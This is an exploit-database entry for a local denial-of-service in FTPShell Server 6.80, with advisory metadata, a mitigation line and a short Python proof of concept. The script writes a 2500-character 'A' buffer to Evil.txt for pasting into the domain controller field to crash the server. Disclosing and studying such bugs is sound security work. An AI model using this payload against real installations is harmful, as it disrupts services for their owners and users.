Vendor: FTPShell Server
By: Hashim Jawad
CVSS: 5.5 (MEDIUM)
Local Denial of Service
CWE
Product Name: FTPShell Server
Affected Version From: 6.8
Affected Version To: 6.8
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows 7 Enterprise - SP1 (x86)
2018

FTPShell Server 6.80 – Local Denial of Service

This proof of concept writes a buffer of 2500 'A' characters to a file called Evil.txt. Pasting the contents of that file into the domain controller field under FTP user accounts causes a denial of service in FTPShell Server 6.80.

Mitigation:

Update FTPShell Server to a non-vulnerable version or apply a patch if available.

Exploit-DB raw data:

# Exploit Title: FTPShell Server 6.80 - Local Denial of Service
# Exploit Author: Hashim Jawad
# Date: 2018-05-23
# Vendor Homepage: http://www.ftpshell.com/
# Vulnerable Software: http://www.ftpshell.com/downloadserver.htm
# Tested on: Windows 7 Enterprise - SP1 (x86)
# Steps to reproduce: under FTP user accounts paste contents of Evil.txt in domain controller field

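#!/usr/bin/python

# 2500 'A' (0x41) characters: the string pasted into the domain controller field
buffer = '\x41' * 2500

try:
	# Write the buffer to Evil.txt so its contents can be copied from the file
	with open("Evil.txt", "w") as f:
		print("[+] Creating %s bytes evil payload.." % len(buffer))
		f.write(buffer)
	print("[+] File created!")
except Exception as e:
	# Report any file I/O error instead of failing silently
	print(e)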